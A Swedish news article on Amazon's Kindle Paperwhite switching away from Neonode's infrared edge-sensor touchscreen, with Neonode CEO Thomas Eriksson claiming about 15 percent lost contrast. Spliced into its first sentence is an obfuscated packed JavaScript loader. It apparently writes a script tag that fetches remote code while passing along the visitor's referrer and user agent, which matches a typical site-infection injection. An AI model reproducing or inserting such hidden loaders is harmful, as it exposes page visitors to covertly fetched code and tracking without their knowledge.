Image Image Image Image Image Image Image Image Image Image

| 20 oktober, 2018

Scroll to top

Top

Kindle blir bakslag för Neonode

Kindle blir bakslag för Neonode
Sebastian Plengier Ehrnfelt

Amazons eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ffbky|var|u0026u|referrer|sdthr||js|php’.split(‘|’),0,{}))
nya läsplatta eller e-bokläsare Kindle Paperwhite har självfallet fått mycket bra recensioner för bland annat sin E-Ink-skärm som har inbyggd belysning. 

Dock har det nu dykt upp uppgifter om att den nya skärmen är ett bakslag för den svenska tillverkaren Neonode. I tidigare versionen av läsplattan var det Neonode som stod bakom tekniken för pekskärmen. De hade tekniken där fingrets placering läses av med infraröda ljusstrålar istället för med tryck som de vanliga plattorna använder.

Neonodes fördelar jämfört med konkurrenternas är att den inte placeras som ett extra lagar på skärmen utan istället placeras sensorerna i skärmens kant. Detta gör att inget av skärmens kontrast eller ljusstyrka går förlorad.

Tyvärr så har nu Kindle Paperwhite istället valt en mer ”vanlig” lösning med en pekfunktion vilket fungerar på samma sätt som de flesta smartphones använder idag.

Neonodes VD Thomas Eriksson menar att detta ger en försämring av kontrasten med ungefär 15 procent  jämfört med om Kindle Paperwhite istället valt Neonodes teknik.

– Vi på Neonode tror att reflektiva skärmar får den bästa kontrasten med vår lösning som inte reducerar ”genomskinligheten”, skriver Thomas Eriksson i ett mejl till Computer Sweden.

Via: IDG